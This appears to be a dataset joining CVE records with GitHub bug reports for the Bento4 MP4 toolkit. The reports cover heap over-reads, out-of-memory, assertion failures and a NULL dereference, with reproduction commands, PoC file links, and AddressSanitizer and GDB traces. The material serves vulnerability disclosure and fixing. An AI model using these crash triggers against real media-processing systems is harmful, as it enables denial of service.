[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:axiosys:bento4:1.5.1-627:*:*:*:*:*:*:*", "matchCriteriaId": "F87642DF-B939-4195-A2AE-F0F1D39CD16D", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/axiomatic-systems/Bento4/issues/351
[ "Exploit", "Third Party Advisory" ]
github.com
[ "axiomatic-systems", "Bento4" ]
Hi there, Multiple Assertion failed were discovered in AP4_AtomListWriter::Action(AP4_Atom *) in Ap4Atom.cpp Here are the POC files. Please use "./mp42hls $POC" to reproduce the error. [POC.zip](https://github.com/axiomatic-systems/Bento4/files/2719232/POC.zip) The output were shown as follow: ``` Bento4/Source/C++/Core/Ap4Atom.cpp:759: virtual AP4_Result AP4_AtomListWriter::Action(AP4_Atom *) const: Assertion `bytes_written <= atom->GetSize()' failed. Aborted (core dumped) ```
Multiple Assertion failed were discovered in AP4_AtomListWriter::Action(AP4_Atom *) in Ap4Atom.cpp
https://api.github.com/repos/axiomatic-systems/Bento4/issues/351/comments
3
2019-01-01T09:47:39Z
2019-07-24T08:35:38Z
https://github.com/axiomatic-systems/Bento4/issues/351
395,069,674
351
CVE-2019-7698
2019-02-10T22:29:00.373
An issue was discovered in AP4_Array<AP4_CttsTableEntry>::EnsureCapacity in Core/Ap4Array.h in Bento4 1.5.1-627. Crafted MP4 input triggers an attempt at excessive memory allocation, as demonstrated by mp42hls, a related issue to CVE-2018-20095.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "[email protected]", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.0" }, "exploitabilityScore": 2.8, "impactScore": 3.6, "source": "[email protected]", "type": "Primary" } ], "cvssMetricV31": null }
[ { "source": "[email protected]", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/axiomatic-systems/Bento4/issues/354" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:axiosys:bento4:1.5.1-627:*:*:*:*:*:*:*", "matchCriteriaId": "F87642DF-B939-4195-A2AE-F0F1D39CD16D", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/axiomatic-systems/Bento4/issues/354
[ "Exploit", "Third Party Advisory" ]
github.com
[ "axiomatic-systems", "Bento4" ]
Hi, there. I test the program at the master branch. ``` commit 5a0ce8023ea312a2d87c194049106e893ed57767 Merge: 91d2bc6 bab5bb9 Author: Gilles Boccon-Gibod <[email protected]> Date: Fri Dec 28 22:42:38 2018 -0800 Merge pull request #347 from orivej/apps Let Scons and CMake build all apps ``` An Out of Memory problem was discovered in function AP4_Array<AP4_CttsTableEntry>::EnsureCapacity in Ap4Array.h. The program tries to allocate with a large number size( 0x6eff83000 bytes) of memory. Please use the "./mp4dump $POC" to reproduce the bug. [POC.zip](https://github.com/axiomatic-systems/Bento4/files/2719261/POC.zip)
when running mp4dump, there is a out-of-memory problem in AP4_Array<AP4_CttsTableEntry>::EnsureCapacity in Ap4Array.h
https://api.github.com/repos/axiomatic-systems/Bento4/issues/354/comments
1
2019-01-01T10:46:25Z
2019-01-01T10:46:50Z
https://github.com/axiomatic-systems/Bento4/issues/354
395,072,870
354
CVE-2019-7699
2019-02-10T22:29:00.403
A heap-based buffer over-read occurs in AP4_BitStream::WriteBytes in Codecs/Ap4BitStream.cpp in Bento4 v1.5.1-627. Remote attackers could leverage this vulnerability to cause an exception via crafted mp4 input, which leads to a denial of service.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "[email protected]", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.0" }, "exploitabilityScore": 2.8, "impactScore": 3.6, "source": "[email protected]", "type": "Primary" } ], "cvssMetricV31": null }
[ { "source": "[email protected]", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/axiomatic-systems/Bento4/issues/355" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:axiosys:bento4:1.5.1-627:*:*:*:*:*:*:*", "matchCriteriaId": "F87642DF-B939-4195-A2AE-F0F1D39CD16D", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/axiomatic-systems/Bento4/issues/355
[ "Exploit", "Third Party Advisory" ]
github.com
[ "axiomatic-systems", "Bento4" ]
Hi, there. A Heap-buffer-overflow problem was discovered in function AP4_BitStream::WriteBytes(unsigned char const*, unsigned int) in Ap4BitStream.cpp. A crafted input can cause segment faults and I have confirmed them with address sanitizer too. Here are the POC files. Please use "./avcinfo $POC" to reproduce the error. [POC.zip](https://github.com/axiomatic-systems/Bento4/files/2719284/POC.zip) ``` ================================================================= ==5498==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x60200000eff4 at pc 0x0000004a817d bp 0x7ffddfab9910 sp 0x7ffddfab90c0 READ of size 8 at 0x60200000eff4 thread T0 #0 0x4a817c in __asan_memcpy (/Bento4/Build/avcinfo+0x4a817c) #1 0x4f90ab in AP4_BitStream::WriteBytes(unsigned char const*, unsigned int) /Bento4/Source/C++/Codecs/Ap4BitStream.cpp:133:9 #2 0x4f4829 in PrintSliceInfo(unsigned char const*) /Bento4/Source/C++/Apps/AvcInfo/AvcInfo.cpp:84:5 #3 0x4f40a3 in main /Bento4/Source/C++/Apps/AvcInfo/AvcInfo.cpp:171:21 #4 0x7f9e01e3982f in __libc_start_main /build/glibc-Cl5G7W/glibc-2.23/csu/../csu/libc-start.c:291 #5 0x41e318 in _start (/Bento4/Build/avcinfo+0x41e318) 0x60200000eff4 is located 0 bytes to the right of 4-byte region [0x60200000eff0,0x60200000eff4) allocated by thread T0 here: #0 0x4efb90 in operator new[](unsigned long) (/Bento4/Build/avcinfo+0x4efb90) #1 0x51b622 in AP4_DataBuffer::ReallocateBuffer(unsigned int) /Bento4/Source/C++/Core/Ap4DataBuffer.cpp:210:28 #2 0x51bb39 in AP4_DataBuffer::SetDataSize(unsigned int) /Bento4/Source/C++/Core/Ap4DataBuffer.cpp:151:33 #3 0x4f786b in AP4_NalParser::Feed(void const*, unsigned int, unsigned int&, AP4_DataBuffer const*&, bool) /Bento4/Source/C++/Codecs/Ap4NalParser.cpp:188:9 #4 0x4f39f5 in main /Bento4/Source/C++/Apps/AvcInfo/AvcInfo.cpp:150:22 #5 0x7f9e01e3982f in __libc_start_main /build/glibc-Cl5G7W/glibc-2.23/csu/../csu/libc-start.c:291 SUMMARY: AddressSanitizer: heap-buffer-overflow (/Bento4/Build/avcinfo+0x4a817c) in __asan_memcpy Shadow bytes around the buggy address: 0x0c047fff9da0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff9db0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff9dc0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff9dd0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff9de0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa =>0x0c047fff9df0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa[04]fa 0x0c047fff9e00: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff9e10: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff9e20: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff9e30: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff9e40: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Heap right redzone: fb Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb ==5498==ABORTING Aborted ``` $ git log ``` commit 5a0ce8023ea312a2d87c194049106e893ed57767 Merge: 91d2bc6 bab5bb9 Author: Gilles Boccon-Gibod <[email protected]> Date: Fri Dec 28 22:42:38 2018 -0800 Merge pull request #347 from orivej/apps Let Scons and CMake build all apps ```
When running avcinfo, a heap-buffer-overflow occur in function AP4_BitStream::WriteBytes in Ap4BitStream.cpp
https://api.github.com/repos/axiomatic-systems/Bento4/issues/355/comments
0
2019-01-01T11:33:09Z
2019-01-01T11:33:09Z
https://github.com/axiomatic-systems/Bento4/issues/355
395,075,442
355
CVE-2019-8378
2019-02-17T02:29:00.363
An issue was discovered in Bento4 1.5.1-628. A heap-based buffer over-read exists in AP4_BitStream::ReadBytes() in Codecs/Ap4BitStream.cpp, a similar issue to CVE-2017-14645. It can be triggered by sending a crafted file to the aac2mp4 binary. It allows an attacker to cause a Denial of Service (Segmentation fault) or possibly have unspecified other impact.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "[email protected]", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0" }, "exploitabilityScore": 2.8, "impactScore": 5.9, "source": "[email protected]", "type": "Primary" } ], "cvssMetricV31": null }
[ { "source": "[email protected]", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/axiomatic-systems/Bento4/issues/363" }, { "source": "[email protected]", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://research.loginsoft.com/bugs/a-heap-buffer-overflow-vulnerability-in-the-function-ap4_bitstreamreadbytes-bento4-1-5-1-628/" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:axiosys:bento4:1.5.1-628:*:*:*:*:*:*:*", "matchCriteriaId": "27A2EAA1-1740-4A14-BFFC-BD4406E9BD87", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/axiomatic-systems/Bento4/issues/363
[ "Exploit", "Third Party Advisory" ]
github.com
[ "axiomatic-systems", "Bento4" ]
**Description** - we observed a heap-buffer-overflow occured in function` AP4_BitStream::ReadBytes()` located in `Ap4BitStream.cpp`.The same be triggered by sending a crafted file to the aac2mp4 binary. It allows an attacker to cause Denial of Service (Segmentation fault) or possibly have unspecified other impact. **Command** - `./aac2mp4 $POC output.mp4` **POC** - [REPRODUCER](https://github.com/SegfaultMasters/covering360/blob/master/BENTO4/HEAP_BOF_POC?raw=true) **Degub** - **ASAN REPORT** - ```` ASAN REPORT: ==2056==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x625000002100 at pc 0x7ffff6e93733 bp 0x7fffffffc840 sp 0x7fffffffbfe8 READ of size 4294967289 at 0x625000002100 thread T0 #0 0x7ffff6e93732 (/usr/lib/x86_64-linux-gnu/libasan.so.4+0x79732) #1 0x555555868840 in AP4_BitStream::ReadBytes(unsigned char*, unsigned int) /home/aceteam/Desktop/packages/Bento4/Source/C++/Codecs/Ap4BitStream.cpp:192 #2 0x555555864ecb in main /home/aceteam/Desktop/packages/Bento4/Source/C++/Apps/Aac2Mp4/Aac2Mp4.cpp:142 #3 0x7ffff64a9b96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96) #4 0x555555864369 in _start (/home/aceteam/Desktop/packages/Bento4/builds/aac2mp4+0x310369) 0x625000002100 is located 0 bytes to the right of 8192-byte region [0x625000000100,0x625000002100) allocated by thread T0 here: #0 0x7ffff6efa618 in operator new [] (unsigned long) (/usr/lib/x86_64-linux-gnu/libasan.so.4+0xe0618) #1 0x555555867a67 in AP4_BitStream: AP4_BitStream () /home/aceteam/Desktop/packages/Bento4/Source/C++/Codecs/Ap4BitStream.cpp:45 #2 0x5555558661f2 in AP4_AdtsParser: AP4_AdtsParser () /home/aceteam/Desktop/packages/Bento4/Source/C++/Codecs/Ap4AdtsParser.cpp:125 #3 0x55555586492a in main /home/aceteam/Desktop/packages/Bento4/Source/C++/Apps/Aac2Mp4/Aac2Mp4.cpp:100 #4 0x7ffff64a9b96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96) SUMMARY: AddressSanitizer: heap-buffer-overflow (/usr/lib/x86_64-linux-gnu/libasan.so.4+0x79732) Shadow bytes around the buggy address: 0x0c4a7fff83d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c4a7fff83e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c4a7fff83f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c4a7fff8400: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c4a7fff8410: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 =>0x0c4a7fff8420: [fa]fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c4a7fff8430: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c4a7fff8440: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c4a7fff8450: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c4a7fff8460: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c4a7fff8470: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb ==2056==ABORTING ```` **GDB** - ```` Program received signal SIGSEGV, Segmentation fault. [ Legend: Modified register | Code | Heap | Stack | String ] ───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────[ registers ]──── $rax : 0x7ffef70a4010 β†’ 0x0000000000000000 $rbx : 0x7fffffffcc48 β†’ 0x000055555588f8d0 β†’ 0xf7c6e70fa88241a4 $rcx : 0x555555890136 β†’ 0x100389d9fd941721 $rdx : 0xfffffff9 $rsp : 0x7fffffffcb48 β†’ 0x00005555555bd601 β†’ <AP4_BitStream::ReadBytes(unsigned+0> mov rax, QWORD PTR [rbp-0x18] $rbp : 0x7fffffffcb80 β†’ 0x00007fffffffdca0 β†’ 0x0000555555631190 β†’ <__libc_csu_init+0> push r15 $rsi : 0x555555890136 β†’ 0x100389d9fd941721 $rdi : 0x7ffef70a4010 β†’ 0x0000000000000000 $rip : 0x7ffff74fe6d3 β†’ <__memmove_sse2_unaligned_erms+435> movups xmm8, XMMWORD PTR [rsi+rdx*1-0x10] $r8 : 0xffffffff $r9 : 0x0 $r10 : 0x22 $r11 : 0x246 $r12 : 0xfffffff9 $r13 : 0x7fffffffdd80 β†’ 0x0000000000000003 $r14 : 0x0 $r15 : 0x0 $eflags: [zero carry parity ADJUST sign trap INTERRUPT direction overflow RESUME virtualx86 identification] $gs: 0x0000 $fs: 0x0000 $ds: 0x0000 $ss: 0x002b $es: 0x0000 $cs: 0x0033 ───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────[ stack ]──── 0x00007fffffffcb48β”‚+0x00: 0x00005555555bd601 β†’ <AP4_BitStream::ReadBytes(unsigned+0> mov rax, QWORD PTR [rbp-0x18] ← $rsp 0x00007fffffffcb50β”‚+0x08: 0x00007fffffffcb80 β†’ 0x00007fffffffdca0 β†’ 0x0000555555631190 β†’ <__libc_csu_init+0> push r15 0x00007fffffffcb58β”‚+0x10: 0xfffffff95589a0a0 0x00007fffffffcb60β”‚+0x18: 0x00007ffef70a4010 β†’ 0x0000000000000000 0x00007fffffffcb68β”‚+0x20: 0x00007fffffffcc48 β†’ 0x000055555588f8d0 β†’ 0xf7c6e70fa88241a4 0x00007fffffffcb70β”‚+0x28: 0x000055555589a070 β†’ 0x00005555558714c8 β†’ 0x00005555555bec94 β†’ <AP4_MemoryByteStream::~AP4_MemoryByteStream()+0> push rbp 0x00007fffffffcb78β”‚+0x30: 0xe9967b959a292100 0x00007fffffffcb80β”‚+0x38: 0x00007fffffffdca0 β†’ 0x0000555555631190 β†’ <__libc_csu_init+0> push r15 ← $rbp ────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────[ code:i386:x86-64 ]──── 0x7ffff74fe6c6 <__memmove_sse2_unaligned_erms+422> movups xmm5, XMMWORD PTR es:[rsi+0x10] 0x7ffff74fe6cb <__memmove_sse2_unaligned_erms+427> movups xmm6, XMMWORD PTR [rsi+0x20] 0x7ffff74fe6cf <__memmove_sse2_unaligned_erms+431> movups xmm7, XMMWORD PTR [rsi+0x30] β†’ 0x7ffff74fe6d3 <__memmove_sse2_unaligned_erms+435> movups xmm8, XMMWORD PTR [rsi+rdx*1-0x10] 0x7ffff74fe6d9 <__memmove_sse2_unaligned_erms+441> lea r11, [rdi+rdx*1-0x10] 0x7ffff74fe6de <__memmove_sse2_unaligned_erms+446> lea rcx, [rsi+rdx*1-0x10] 0x7ffff74fe6e3 <__memmove_sse2_unaligned_erms+451> mov r9, r11 0x7ffff74fe6e6 <__memmove_sse2_unaligned_erms+454> mov r8, r11 0x7ffff74fe6e9 <__memmove_sse2_unaligned_erms+457> and r8, 0xf ─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────[ threads ]──── [#0] Id 1, Name: "aac2mp4", stopped, reason: SIGSEGV ───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────[ trace ]──── [#0] 0x7ffff74fe6d3 β†’ Name: __memmove_sse2_unaligned_erms() [#1] 0x5555555bd601 β†’ Name: AP4_BitStream::ReadBytes(this=0x7fffffffcc48, bytes=0x7ffef70a4010 "", byte_count=0xfffffff9) [#2] 0x5555555bc395 β†’ Name: main(argc=0x3, argv=0x7fffffffdd88) ````
A heap-buffer-overflow occured in function AP4_BitStream::ReadBytes()
https://api.github.com/repos/axiomatic-systems/Bento4/issues/363/comments
0
2019-01-29T07:09:12Z
2019-02-01T10:24:02Z
https://github.com/axiomatic-systems/Bento4/issues/363
404,151,105
363
CVE-2019-8380
2019-02-17T02:29:00.473
An issue was discovered in Bento4 1.5.1-628. A NULL pointer dereference occurs in AP4_Track::GetSampleIndexForTimeStampMs() located in Core/Ap4Track.cpp. It can triggered by sending a crafted file to the mp4audioclip binary. It allows an attacker to cause a Denial of Service (Segmentation fault) or possibly have unspecified other impact.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "[email protected]", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0" }, "exploitabilityScore": 2.8, "impactScore": 5.9, "source": "[email protected]", "type": "Primary" } ], "cvssMetricV31": null }
[ { "source": "[email protected]", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/axiomatic-systems/Bento4/issues/366" }, { "source": "[email protected]", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://research.loginsoft.com/bugs/null-pointer-dereference-vulnerability-in-function-ap4_trackgetsampleindexfortimestampms-bento4-1-5-1-628/" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:axiosys:bento4:1.5.1-628:*:*:*:*:*:*:*", "matchCriteriaId": "27A2EAA1-1740-4A14-BFFC-BD4406E9BD87", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/axiomatic-systems/Bento4/issues/366
[ "Exploit", "Third Party Advisory" ]
github.com
[ "axiomatic-systems", "Bento4" ]
**Description** - we observed a NULL pointer dereference occured in `AP4_Track::GetSampleIndexForTimeStampMs()` located in `Ap4Track.cpp`.The same be triggered by sending a crafted file to the mp4audioclip binary. It allows an attacker to cause Denial of Service (Segmentation fault) or possibly have unspecified other impact. **Command** - `./mp4audioclip --start 0 --duration 100 $POC OUTPUTFILE` **POC** - [REPRODUCER](https://github.com/SegfaultMasters/covering360/blob/master/BENTO4/NP_POC?raw=true) **Debug** - **GDB** - ``` 0x00000000004585cb in AP4_Track::GetSampleIndexForTimeStampMs (this=0x6040000001d0, ts_ms=0x0, index=@0x7fffffffdb10: 0x0) at /home/ace/Downloads/sources/Bento4/Source/C++/Core/Ap4Track.cpp:485 485 return m_SampleTable->GetSampleIndexForTimeStamp(ts, index); [ Legend: Modified register | Code | Heap | Stack | String ] ───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────[ registers ]──── $rax : 0x0 $rbx : 0x7fffffffdd70 β†’ 0x0000000000000000 $rcx : 0x0 $rdx : 0x0 $rsp : 0x7fffffffd9d0 β†’ 0x00007fffffffda00 β†’ 0x00007fffffffdda0 β†’ 0x0000000000578490 β†’ <__libc_csu_init+0> push r15 $rbp : 0x7fffffffda00 β†’ 0x00007fffffffdda0 β†’ 0x0000000000578490 β†’ <__libc_csu_init+0> push r15 $rsi : 0x0 $rdi : 0x0 $rip : 0x4585cb β†’ <AP4_Track::GetSampleIndexForTimeStampMs(unsigned+0> mov rax, QWORD PTR [rax] $r8 : 0x0 $r9 : 0x0 $r10 : 0x60b0000000e0 β†’ 0x14ffffff00000002 $r11 : 0x7fffffffd1d8 β†’ 0x000060c000000090 β†’ 0x00000000005caca0 β†’ 0x00000000004809d6 β†’ <AP4_List<AP4_TrakAtom>::~AP4_List()+0> push rbp $r12 : 0xffffffffb56 β†’ 0x0000000000000000 $r13 : 0x7fffffffdab0 β†’ 0x0000000041b58ab3 $r14 : 0x60b0000000f0 β†’ 0x00000000005ecdb0 β†’ 0x000000000048acd4 β†’ <AP4_SyntheticSampleTable::~AP4_SyntheticSampleTable()+0> push rbp $r15 : 0x0 $eflags: [carry PARITY adjust ZERO sign trap INTERRUPT direction overflow RESUME virtualx86 identification] $ss: 0x002b $fs: 0x0000 $es: 0x0000 $ds: 0x0000 $gs: 0x0000 $cs: 0x0033 ───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────[ stack ]──── 0x00007fffffffd9d0β”‚+0x00: 0x00007fffffffda00 β†’ 0x00007fffffffdda0 β†’ 0x0000000000578490 β†’ <__libc_csu_init+0> push r15 ← $rsp 0x00007fffffffd9d8β”‚+0x08: 0x00007fffffffdb10 β†’ 0x00007fff00000000 0x00007fffffffd9e0β”‚+0x10: 0x000000000000bb80 0x00007fffffffd9e8β”‚+0x18: 0x00006040000001d0 β†’ 0x0000000000596420 β†’ 0x000000000045725e β†’ <AP4_Track::~AP4_Track()+0> push rbp 0x00007fffffffd9f0β”‚+0x20: 0x0000000a00000000 β†’ 0x0000000000000000 0x00007fffffffd9f8β”‚+0x28: 0x0000000000000000 0x00007fffffffda00β”‚+0x30: 0x00007fffffffdda0 β†’ 0x0000000000578490 β†’ <__libc_csu_init+0> push r15 ← $rbp 0x00007fffffffda08β”‚+0x38: 0x0000000000451b68 β†’ <main+1950> test eax, eax ────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────[ code:i386:x86-64 ]──── 0x4585c0 <AP4_Track::GetSampleIndexForTimeStampMs(unsigned+0> div BYTE PTR [rax+rcx*1+0x48] 0x4585c4 <AP4_Track::GetSampleIndexForTimeStampMs(unsigned+0> mov edi, edx 0x4585c6 <AP4_Track::GetSampleIndexForTimeStampMs(unsigned+0> call 0x451140 <__asan_report_load8@plt> β†’ 0x4585cb <AP4_Track::GetSampleIndexForTimeStampMs(unsigned+0> mov rax, QWORD PTR [rax] 0x4585ce <AP4_Track::GetSampleIndexForTimeStampMs(unsigned+0> add rax, 0x40 0x4585d2 <AP4_Track::GetSampleIndexForTimeStampMs(unsigned+0> mov rdx, rax 0x4585d5 <AP4_Track::GetSampleIndexForTimeStampMs(unsigned+0> mov rsi, rdx 0x4585d8 <AP4_Track::GetSampleIndexForTimeStampMs(unsigned+0> shr rsi, 0x3 0x4585dc <AP4_Track::GetSampleIndexForTimeStampMs(unsigned+0> add rsi, 0x7fff8000 ──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────[ source:/home/ace/Downloads/sources/Bento4/Source/C++/Core/Ap4Track.cpp+485 ]──── 480 AP4_Track::GetSampleIndexForTimeStampMs(AP4_UI32 ts_ms, AP4_Ordinal& index) 481 { 482 // convert the ts in the timescale of the track's media 483 AP4_UI64 ts = AP4_ConvertTime(ts_ms, 1000, GetMediaTimeScale()); 484 β†’ 485 return m_SampleTable->GetSampleIndexForTimeStamp(ts, index); 486 } 487 488 /*---------------------------------------------------------------------- 489 | AP4_Track::GetNearestSyncSampleIndex 490 +---------------------------------------------------------------------*/ ─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────[ threads ]──── [#0] Id 1, Name: "mp4audioclip", stopped, reason: SIGSEGV ───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────[ trace ]──── [#0] 0x4585cb β†’ Name: AP4_Track::GetSampleIndexForTimeStampMs(this=0x6040000001d0, ts_ms=0x0, index=@0x7fffffffdb10) [#1] 0x451b68 β†’ Name: main(argc=0x7, argv=0x7fffffffdec0) gef➀ p ts $4 = 0x0 gef➀ p index $5 = (AP4_Ordinal &) @0x7fffffffdb10: 0x0 gef➀ p m_SampleTable $6 = (AP4_SampleTable *) 0x0 gef➀ p m_SampleTable->GetSampleIndexForTimeStamp(ts, index) Cannot access memory at address 0x0 ```
NULL POINTER DEREFERENCE in AP4_Track::GetSampleIndexForTimeStampMs()
https://api.github.com/repos/axiomatic-systems/Bento4/issues/366/comments
0
2019-02-07T06:32:20Z
2019-02-07T06:32:50Z
https://github.com/axiomatic-systems/Bento4/issues/366
407,559,605
366
CVE-2019-8382
2019-02-17T02:29:00.597
